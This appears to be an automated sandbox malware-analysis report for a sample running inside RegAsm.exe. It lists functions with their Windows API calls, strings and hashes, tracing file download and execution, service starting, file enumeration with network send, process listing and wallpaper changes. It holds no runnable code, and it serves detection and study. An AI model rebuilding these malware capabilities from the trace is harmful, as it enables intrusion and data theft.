                                                                                                • Part of subcall function 00401C4F: CloseHandle.KERNEL32(?,?,00467C58), ref: 00401C71
                                                                                              • FindClose.KERNEL32(00000000), ref: 0040768B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Find$Close$File$EventException@8FirstH_prologHandleNextObjectSingleThrowWaitconnectsend
                                                                                              • String ID:
                                                                                              • API String ID: 4178801697-0
                                                                                              • Opcode ID: 4ef0fa9968788e8b0817db2a64f54c3d4103c6ca0b97b15f0ad0523b28addf7b
                                                                                              • Instruction ID: 7202f6ce65fafa98fb7de63047c39e51e87502bb610d5f7c02fe3bbf75a70c5a
                                                                                              • Opcode Fuzzy Hash: 4ef0fa9968788e8b0817db2a64f54c3d4103c6ca0b97b15f0ad0523b28addf7b
                                                                                              • Instruction Fuzzy Hash: C0C1AC319001089BDB14EB60CD92AEE7779AF10318F50417EE906B71E1EB38AF49CB99
                                                                                              Function 00413168 Relevance: 9.0, APIs: 6, Instructions: 42serviceCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,?,00412DF3,00000000), ref: 00413174
                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,00412DF3,00000000), ref: 00413188
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,00412DF3,00000000), ref: 00413195
                                                                                              • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,00412DF3,00000000), ref: 004131A0
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,00412DF3,00000000), ref: 004131B2
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,00412DF3,00000000), ref: 004131B5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                              • String ID:
                                                                                              • API String ID: 276877138-0
                                                                                              • Opcode ID: 3918c8a7ce19c406c69db840a7e5c63a46351091558a5f9bd009cd153cdc24fa
                                                                                              • Instruction ID: 728c1f078413431713c18eccfbc5b09ab83812d1f123983b22c07ece6b5a69bb
                                                                                              • Opcode Fuzzy Hash: 3918c8a7ce19c406c69db840a7e5c63a46351091558a5f9bd009cd153cdc24fa
                                                                                              • Instruction Fuzzy Hash: C6F0B4795011287FE2116F259C89DBF3B6CDF863AAF040026F90993140CE788E86A5B8
                                                                                              Function 00443EE9 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0043C614: GetLastError.KERNEL32(?,00000000,0043783C,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C618
                                                                                                • Part of subcall function 0043C614: _free.LIBCMT ref: 0043C64B
                                                                                                • Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C68C
                                                                                                • Part of subcall function 0043C614: _abort.LIBCMT ref: 0043C692
                                                                                              • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0043A141,?,?,?,?,00439B98,?,00000004), ref: 00443FCB
                                                                                              • _wcschr.LIBVCRUNTIME ref: 0044405B
                                                                                              • _wcschr.LIBVCRUNTIME ref: 00444069
                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,0043A141,00000000,0043A261), ref: 0044410C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                              • String ID: |9E
                                                                                              • API String ID: 4212172061-2862116995
                                                                                              • Opcode ID: d99bc2a9675463053ab5ccacbb4c5199fc514b40bbba0e249075e0b3688c31d4
                                                                                              • Instruction ID: 32e737dee43cd030fe8cef7ac27ade77768f3db5fce4e08c52ba53364ae33a46
                                                                                              • Opcode Fuzzy Hash: d99bc2a9675463053ab5ccacbb4c5199fc514b40bbba0e249075e0b3688c31d4
                                                                                              • Instruction Fuzzy Hash: A861FA71A00206AAF724AF76CC42BBB73A8EF44715F14052FFA05D7281EB78DD458769
                                                                                              Function 00413B85 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 00413B96
                                                                                              • LoadResource.KERNEL32(00000000,?,?,0040A627,00000000), ref: 00413BAA
                                                                                              • LockResource.KERNEL32(00000000,?,?,0040A627,00000000), ref: 00413BB1
                                                                                              • SizeofResource.KERNEL32(00000000,?,?,0040A627,00000000), ref: 00413BC0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                                              • String ID: SETTINGS
                                                                                              • API String ID: 3473537107-594951305
                                                                                              • Opcode ID: 263d98506411805d18de30793c85a23ac3b7c2f73439d8eab52d1c55755b40a5
                                                                                              • Instruction ID: bd5ac476d8bf3fa726269e040eb6de6ac2e9741c8027eb8ad6766d5099f1ebf2
                                                                                              • Opcode Fuzzy Hash: 263d98506411805d18de30793c85a23ac3b7c2f73439d8eab52d1c55755b40a5
                                                                                              • Instruction Fuzzy Hash: 77E04F7EA00610AFD7212FE1AC8CD0B7EB9E7CAB52B140235FD01D7221EA768804CF59
                                                                                              Function 00407733 Relevance: 7.7, APIs: 5, Instructions: 245fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00407738
                                                                                                • Part of subcall function 00406B5E: char_traits.LIBCPMT ref: 00406B79
                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004077B0
                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 004077D9
                                                                                              • FindClose.KERNEL32(000000FF), ref: 004077F0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Find$File$CloseFirstH_prologNextchar_traits
                                                                                              • String ID:
                                                                                              • API String ID: 3260228402-0
                                                                                              • Opcode ID: d16cf308edefdbf95cb46eefa4a645e1d447721f0ff62b56dc3c87c90f160b4f
                                                                                              • Instruction ID: a5bca9eea51d8a3269136c205410c130ed0051bea8ed056c38eb20d9fbddcba5
                                                                                              • Opcode Fuzzy Hash: d16cf308edefdbf95cb46eefa4a645e1d447721f0ff62b56dc3c87c90f160b4f
                                                                                              • Instruction Fuzzy Hash: 8E9159329000199BCB15FFA1CC929EE7779AF10348F14417BE906B71E1EB39AB49CB59
                                                                                              Function 00405C8E Relevance: 7.7, APIs: 5, Instructions: 210fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00405C93
                                                                                              • FindFirstFileW.KERNEL32(00000000,?,004596B8,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405D4C
                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00405D74
                                                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405D81
                                                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405EE1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                                              • String ID:
                                                                                              • API String ID: 1771804793-0
                                                                                              • Opcode ID: f97d4f1504f9f5187b2a24337389c292726796a12dc4393d6c8b1e63778533f9
                                                                                              • Instruction ID: 644df84be1dd51f3e46be0d0b0f2c3143fee40e79e208979b12aa7b8aebd657c
                                                                                              • Opcode Fuzzy Hash: f97d4f1504f9f5187b2a24337389c292726796a12dc4393d6c8b1e63778533f9
                                                                                              • Instruction Fuzzy Hash: C0715C71900109AACB04FF61DD569EE7769EF20348F50417BF906B71D2EB38AB49CB98
                                                                                              Function 0040CB6C Relevance: 7.7, APIs: 5, Instructions: 206memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0040C60C: SetLastError.KERNEL32(0000000D,0040CB8B,00000000,00000000,00000000), ref: 0040C612
                                                                                              • SetLastError.KERNEL32(000000C1,00000000,00000000,00000000), ref: 0040CBA2
                                                                                              • GetNativeSystemInfo.KERNEL32(?,00000000,00000000,00000000), ref: 0040CC15
                                                                                              • GetProcessHeap.KERNEL32(00000008,00000040), ref: 0040CC81
                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0040CC88
                                                                                              • SetLastError.KERNEL32(0000045A), ref: 0040CD9A
                                                                                                • Part of subcall function 0040CB1F: VirtualFree.KERNEL32(00008000,00000000,00000000,?,0040CCA1,00000000,00000000,00008000,00000000), ref: 0040CB2B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$Heap$AllocFreeInfoNativeProcessSystemVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 486403682-0
                                                                                              • Opcode ID: 4adddcbbc2acc18d42834cc587bd1a751958d041fb9292e9324df411bf8be2ea
                                                                                              • Instruction ID: e6e8c6485ed81cd1fca12390261a6ee4e02eb1f9f339570914d2f341853158c0
                                                                                              • Opcode Fuzzy Hash: 4adddcbbc2acc18d42834cc587bd1a751958d041fb9292e9324df411bf8be2ea
                                                                                              • Instruction Fuzzy Hash: F361CF70A00201EBDB109F66C9C2B6ABBB5BF84704F14427AE905BB7C1D77CE941CB99
                                                                                              Function 00414D7F Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 00414E74
                                                                                                • Part of subcall function 0040D202: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0040D211
                                                                                                • Part of subcall function 0040D202: RegSetValueExA.KERNEL32(?,00459EE8,00000000,?,00000000,00000000,00467F30,?,?,0040A763,00459EE8,5.1.3 Light), ref: 0040D239
                                                                                                • Part of subcall function 0040D202: RegCloseKey.KERNEL32(?,?,?,0040A763,00459EE8,5.1.3 Light), ref: 0040D244
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseCreateInfoParametersSystemValue
                                                                                              • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                              • API String ID: 4127273184-3576401099
                                                                                              • Opcode ID: bd12275f3f6cd1d669989ca051e00a63e2fdd3ef9dd0543eca36a2463057cf65
                                                                                              • Instruction ID: bb2a44e1ed6c38dfa1a502633be872de791d5c7f5d259041969d25b46d9350ba
                                                                                              • Opcode Fuzzy Hash: bd12275f3f6cd1d669989ca051e00a63e2fdd3ef9dd0543eca36a2463057cf65
                                                                                              • Instruction Fuzzy Hash: F111A172B8030077D909303A0D5BFAE2C159B92B52F95016BFE017A2D7E9DE4A9903CF
                                                                                              Function 004320EC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004321E4
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004321EE
                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004321FB
                                                                                              Strings
                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 00432105
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              • API String ID: 3906539128-1068371695
                                                                                              • Opcode ID: 17a952e660d70814d57f60f7e6f4e4c9fa82c9629f664b16cd2a329d852c6d80
                                                                                              • Instruction ID: 35e80af348abaaee4114425dc0c0632cf56bb04d932113a279ddada4047cb47e
                                                                                              • Opcode Fuzzy Hash: 17a952e660d70814d57f60f7e6f4e4c9fa82c9629f664b16cd2a329d852c6d80
                                                                                              • Instruction Fuzzy Hash: 7D31D574D412289BCB21DF65DD89B9DB7B8BF08310F5042EAE81CA7251E7749B818F49
                                                                                              Function 0040A7FF Relevance: 6.1, APIs: 4, Instructions: 127processCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00414452: GetCurrentProcess.KERNEL32(00000001,?,00000000,0040907E,WinDir,00000000,00000000), ref: 00414463
                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040A81F
                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 0040A841
                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040A9C8
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040A9D7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Process32$CloseCreateCurrentFirstHandleNextProcessSnapshotToolhelp32
                                                                                              • String ID:
                                                                                              • API String ID: 592884611-0
                                                                                              • Opcode ID: aeb5a68b20e794033a9173690244f1367910b85b41ae6b5e9ddc33e91f7bf119
                                                                                              • Instruction ID: 243f6cd1f81f9c8f55a8f0024b00723f56764068984f0561bc3222dd9606701d
                                                                                              • Opcode Fuzzy Hash: aeb5a68b20e794033a9173690244f1367910b85b41ae6b5e9ddc33e91f7bf119
                                                                                              • Instruction Fuzzy Hash: 6B412031A102299BC715FB61DC56AEEB378AF50304F1040BFF60A761D2EE785EC9CA59
                                                                                              Function 00404A3B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 157filenetworkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00404B51
                                                                                              • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00404BE8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: DownloadExecuteFileShell
                                                                                              • String ID: open
                                                                                              • API String ID: 2825088817-2758837156
                                                                                              • Opcode ID: 9c2f9ba823165c8d2d007a235c3eb5e40a839811e1293ca1dc620077e5be148e
                                                                                              • Instruction ID: e27ae4924a228426fb0fa60c58d648a9e47e27aaaaa9c80784e0ca9243a57cd1
                                                                                              • Opcode Fuzzy Hash: 9c2f9ba823165c8d2d007a235c3eb5e40a839811e1293ca1dc620077e5be148e
                                                                                              • Instruction Fuzzy Hash: 0641F47160430066DA15FA31C95AAAE37A99BD1705F40093FBB427B1D2EE7C9A0CC75A
                                                                                              Function 00404CF3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(00000000,?,?,00000000), ref: 00404D0E
                                                                                              • FindNextFileW.KERNEL32(00000000,?,?), ref: 00404DCE
                                                                                                • Part of subcall function 004018E7: send.WS2_32(?,00000000,00000000,00000000), ref: 0040195A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileFind$FirstNextsend
                                                                                              • String ID: Y\@
                                                                                              • API String ID: 4113138495-4244545509
                                                                                              • Opcode ID: 6d979ed0fb4b88c827191c1ef295b4c74041c2f5cb5d0db5d451f381c0f7e3ff
                                                                                              • Instruction ID: 86d4ecdf3890dc42d56e92d70e3d1e8f32d6d22d1a4151bfebc482781cc436e9
                                                                                              • Opcode Fuzzy Hash: 6d979ed0fb4b88c827191c1ef295b4c74041c2f5cb5d0db5d451f381c0f7e3ff
                                                                                              • Instruction Fuzzy Hash: 0C218171910118AACB04FBA1DC9ADEE7738AF51318F40017BF706771D1EF786A89CA99
                                                                                              Function 004442D4 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0043C614: GetLastError.KERNEL32(?,00000000,0043783C,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C618
                                                                                                • Part of subcall function 0043C614: _free.LIBCMT ref: 0043C64B
                                                                                                • Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C68C
                                                                                                • Part of subcall function 0043C614: _abort.LIBCMT ref: 0043C692
                                                                                                • Part of subcall function 0043C614: _free.LIBCMT ref: 0043C673
                                                                                                • Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C680
                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00444328
                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00444379
                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00444439
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                              • String ID:
                                                                                              • API String ID: 2829624132-0
                                                                                              • Opcode ID: 32f4b9d895ea98af3fd9a5171a8db8fa53e4e0c53919800eec0ada9f8816a44a
                                                                                              • Instruction ID: 1f87c0796c419ade2eae767289d25b359e6e8943c577617cf55981828d241cac
                                                                                              • Opcode Fuzzy Hash: 32f4b9d895ea98af3fd9a5171a8db8fa53e4e0c53919800eec0ada9f8816a44a
                                                                                              • Instruction Fuzzy Hash: C7619371500207ABFF289F24CC82BBA77A8EF44704F1441BAED05D6681EB7CD992DB58
                                                                                              Function 00438983 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000003,?,00438959,00000003,004619C0,0000000C,00438AB0,00000003,00000002,00000000,?,0043B5D8,00000003), ref: 004389A4
                                                                                              • TerminateProcess.KERNEL32(00000000,?,00438959,00000003,004619C0,0000000C,00438AB0,00000003,00000002,00000000,?,0043B5D8,00000003), ref: 004389AB
                                                                                              • ExitProcess.KERNEL32 ref: 004389BD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                              • String ID:
                                                                                              • API String ID: 1703294689-0
                                                                                              • Opcode ID: 028ca32864a5d8a00decbcdfeac547a14969b7e8f12dafd009958018ff53265b
                                                                                              • Instruction ID: ad1314456494e3ed302f9715d1c959e7e451621885e8079f11eafe7d6208c2ac
                                                                                              • Opcode Fuzzy Hash: 028ca32864a5d8a00decbcdfeac547a14969b7e8f12dafd009958018ff53265b
                                                                                              • Instruction Fuzzy Hash: 12E0B675900648ABCF226F65DD09A597B69FF89345F40106AF90A8A221CB79ED42CB88
                                                                                              Function 00440A59 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: .
                                                                                              • API String ID: 0-248832578
                                                                                              • Opcode ID: 6eabc5f11ec1ca2a56f69ff92e525cdbe2e1dd9f0c076f28e47ccd50a7368115
                                                                                              • Instruction ID: 5f8074742a1868b626ed342c3e98615176126d660209178caf4e6f80b034c56a
                                                                                              • Opcode Fuzzy Hash: 6eabc5f11ec1ca2a56f69ff92e525cdbe2e1dd9f0c076f28e47ccd50a7368115
                                                                                              • Instruction Fuzzy Hash: 753137719002486FEB24DE79CC84EFB7BBDDB85308F1002AEFA5897251E634AD518B54
                                                                                              Function 0043D32C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00439B98,?,00000004), ref: 0043D37F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: InfoLocale
                                                                                              • String ID: GetLocaleInfoEx
                                                                                              • API String ID: 2299586839-2904428671
                                                                                              • Opcode ID: b71d05b3c7fe1d4ca99e8279e8949133a53b058c086b6bf9e28b218b471bedce
                                                                                              • Instruction ID: ce4fd747b54faa4bd7a1eeb3bcc1357c013179f80075dd4b8a2cbe4382d00d18
                                                                                              • Opcode Fuzzy Hash: b71d05b3c7fe1d4ca99e8279e8949133a53b058c086b6bf9e28b218b471bedce
                                                                                              • Instruction Fuzzy Hash: B0F02431E40318BBCB116F71EC02FAE7B65EF08B11F10012AFD05662A0DA75AE14D79E
                                                                                              Function 0043B690 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3dc2aaa5ba629767c24c60991e20e51c41170b5e5616752661aee279650f1187
                                                                                              • Instruction ID: 95a343e324232c7d98835ffcd34e263639f39472ec0b3937548a97988adb3f04
                                                                                              • Opcode Fuzzy Hash: 3dc2aaa5ba629767c24c60991e20e51c41170b5e5616752661aee279650f1187
                                                                                              • Instruction Fuzzy Hash: EA022D71E002199BDF14DFA9C8807AEFBF5EF88324F25826AD919E7344D734AD418B94
                                                                                              Function 0044553C Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00445537,?,?,00000008,?,?,00449C9D,00000000), ref: 00445769
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExceptionRaise
                                                                                              • String ID:
                                                                                              • API String ID: 3997070919-0
                                                                                              • Opcode ID: 57b167dff027822b40cd9bf0cc99b9618bd263b207ef16c4545e6c5eba121c6f
                                                                                              • Instruction ID: d9807f6ae093f4c5904e94fcdbc25e2fc9976d51ca65457f1ed2f32b0d277757
                                                                                              • Opcode Fuzzy Hash: 57b167dff027822b40cd9bf0cc99b9618bd263b207ef16c4545e6c5eba121c6f
                                                                                              • Instruction Fuzzy Hash: F1B17F31510A08DFEB15CF28C486B657BE0FF45364F258659E89ACF3A2C739E992CB44
                                                                                              Function 0042B2F1 Relevance: 1.8, Strings: 1, Instructions: 504COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 0
                                                                                              • API String ID: 0-4108050209
                                                                                              • Opcode ID: 093cffccdb6c66a0d7340a85fd8f8add5e90d94a679726dfc5632c4f1750100d
                                                                                              • Instruction ID: 4ec5c20c67ca4022d545f9580ae9730a7cccf3cf0bf7266e2a21cc6c1313b906
                                                                                              • Opcode Fuzzy Hash: 093cffccdb6c66a0d7340a85fd8f8add5e90d94a679726dfc5632c4f1750100d
                                                                                              • Instruction Fuzzy Hash: 15127F36F002288BDB14DBE5E9566BDB3F2EF88314F2544AAD805F7381DA386D01DB94
                                                                                              Function 0042C3C6 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 0042C3DF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FeaturePresentProcessor
                                                                                              • String ID:
                                                                                              • API String ID: 2325560087-0
                                                                                              • Opcode ID: 4657d06232d56aef3570b1a27ce3a6ffe9e3c18176b919e5c76832e2b4ae0a01
                                                                                              • Instruction ID: 2697a07927edba09fa4b120a04b7d5dd22db01720c8de2c3ab983906f36902a3
                                                                                              • Opcode Fuzzy Hash: 4657d06232d56aef3570b1a27ce3a6ffe9e3c18176b919e5c76832e2b4ae0a01
                                                                                              • Instruction Fuzzy Hash: CE519E71A012259BEF14CF69E9C16AEBBF4FB48314F65806AC815E7350E3789940CB65
